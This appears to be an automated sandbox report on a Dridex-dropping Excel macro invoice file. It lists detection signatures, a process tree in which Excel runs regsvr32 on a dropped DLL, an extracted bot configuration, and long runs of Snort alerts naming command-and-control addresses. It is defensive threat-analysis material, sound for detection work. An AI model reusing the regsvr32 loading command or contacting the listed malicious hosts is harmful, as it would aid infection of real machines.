Loading ...

Play interactive tourEdit tour

Analysis Report INV3867196801-20210111675616.xlsm

Overview

General Information

Sample Name:INV3867196801-20210111675616.xlsm
Analysis ID:338155
MD5:9b7c2b0abf5478ef9a23d9a9e87c7835
SHA1:6931c4b845a8a952699d9cf85b316e3b3d826a41
SHA256:a463f9a8842a5c947abaa2bff1b621835ff35f65f9d3272bf1fa5197df9f07d0

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Dridex e-Banking trojan
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query network adapater information
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the installation date of Windows
Registers a DLL
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1296 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2416 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2352 cmdline: -s C:\Users\user\AppData\Local\Temp\jczxic.dll. MD5: 432BE6CF7311062633459EEF6B242FB5)
    • DW20.EXE (PID: 2412 cmdline: 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 2360 MD5: 45A078B2967E0797360A2D4434C41DB4)
      • DWWIN.EXE (PID: 2440 cmdline: C:\Windows\system32\dwwin.exe -x -s 2360 MD5: 25247E3C4E7A7A73BAEEA6C0008952B1)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 61074", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: BlueMashroom DLL LoadShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1296, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., ProcessId: 2416
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1296, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., ProcessId: 2416
Sigma detected: Regsvr32 AnomalyShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1296, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., ProcessId: 2416

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Found malware configurationShow sources
Source: 4.2.regsvr32.exe.270000.1.raw.unpackMalware Configuration Extractor: Dridex {"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 61074", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d4bfa7nne[1].zipReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\jczxic.dllReversingLabs: Detection: 36%
Multi AV Scanner detection for submitted fileShow sources
Source: INV3867196801-20210111675616.xlsmVirustotal: Detection: 33%Perma Link
Source: INV3867196801-20210111675616.xlsmReversingLabs: Detection: 32%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\jczxic.dllJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d4bfa7nne[1].zipJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 185.2.4.104:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49176 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49180 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49184 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49188 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49192 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49196 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49200 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49204 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49208 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49212 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49216 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49216 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49220 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49224 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49230 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49234 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49238 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49242 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49246 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49250 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49254 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49258 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49262 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49266 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49270 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49274 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49278 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49282 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49286 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49290 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49294 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49298 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49302 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49306 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49310 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.168.2.22:49310 -> 77.220.64.37:443 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49314 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49318 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49322 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49326 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49330 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49334 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49338 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49342 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49346 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49350 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49354 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49358 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49362 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49366 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49370 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49374 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49378 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49382 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49386 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49390 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49394 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49398 version: TLS 1.2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002DCEF8 FindFirstFileExW,4_2_002DCEF8

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\jczxic.dllJump to behavior
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: d4bfa7nne[1].zip.0.drJump to dropped file
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exeJump to behavior
Source: global trafficDNS query: name: www5.ritamartins.pt
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.2.4.104:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.2.4.104:443

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49168
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49169
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49170
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49170
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49172
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49173
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49174
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49174
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49176
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49177
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49178
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49178
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49180
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49181
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49182
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49182
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49184
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49185
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49186
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49186
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49188
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49189
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49190
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49190
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49192
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49193
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49194
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49194
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49196
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49197
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49198
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49198
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49200
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49201
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49202
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49202
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49204
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49205
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49206
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49206
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49208
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49209
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49210
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49210
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49212
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49213
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49214
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49214
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49216
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49217
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49218
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49218
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49220
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49221
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49222
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49222
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49224
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49225
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49227
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49227
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49230
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49231
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49232
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49232
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49234
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49235
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49236
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49236
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49238
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49239
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49240
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49240
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49242
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49243
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49244
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49244
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49246
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49247
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49248
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49248
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49250
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49251
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49252
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49252
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49254
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49255
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49256
